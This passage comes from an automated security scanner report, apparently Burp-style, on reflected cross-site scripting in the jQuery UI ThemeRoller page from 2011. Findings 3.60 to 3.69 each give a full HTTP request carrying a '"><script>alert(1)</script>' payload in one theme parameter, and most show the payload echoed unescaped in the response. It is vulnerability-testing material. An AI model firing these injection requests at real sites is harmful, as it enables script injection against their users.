cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545456f5f4"><script>alert(1)</script>c47e4b86f7e&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pn
...[SNIP]...

3.60. http://jqueryui.com/themeroller/ [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88cfb"><script>alert(1)</script>71936ccf771 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222288cfb"><script>alert(1)</script>71936ccf771&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222288cfb"><script>alert(1)</script>71936ccf771&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

3.61. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e81"><script>alert(1)</script>3489c3a9abe was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888835e81"><script>alert(1)</script>3489c3a9abe&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888835e81"><script>alert(1)</script>3489c3a9abe&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6
...[SNIP]...

3.62. http://jqueryui.com/themeroller/ [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccd5"><script>alert(1)</script>cf0fd2d235e was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9ccd5"><script>alert(1)</script>cf0fd2d235e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9ccd5"><script>alert(1)</script>cf0fd2d235e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

3.63. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24500"><script>alert(1)</script>c3b535455c0 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=22222224500"><script>alert(1)</script>c3b535455c0&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=22222224500"><script>alert(1)</script>c3b535455c0&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

3.64. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ff54"><script>alert(1)</script>46d7472778c was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff2ff54"><script>alert(1)</script>46d7472778c&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff2ff54"><script>alert(1)</script>46d7472778c&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

3.65. http://jqueryui.com/themeroller/ [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 794ec"><script>alert(1)</script>a651755401d was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545794ec"><script>alert(1)</script>a651755401d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545794ec"><script>alert(1)</script>a651755401d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa
...[SNIP]...

3.66. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa755"><script>alert(1)</script>9e8658b4fc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?aa755"><script>alert(1)</script>9e8658b4fc4=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 117096

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&aa755"><script>alert(1)</script>9e8658b4fc4=1" type="text/css" media="all" />
...[SNIP]...

3.67. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbeff"><script>alert(1)</script>a1aae8f9b17 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxcbeff"><script>alert(1)</script>a1aae8f9b17&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxcbeff"><script>alert(1)</script>a1aae8f9b17&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.68. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d5c6"><script>alert(1)</script>1cf7b57c6b was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px4d5c6"><script>alert(1)</script>1cf7b57c6b&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px4d5c6"><script>alert(1)</script>1cf7b57c6b&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.69. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5be49"><script>alert(1)</script>a6f58046687 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305be49"><script>alert(1)</script>a6f58046687&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
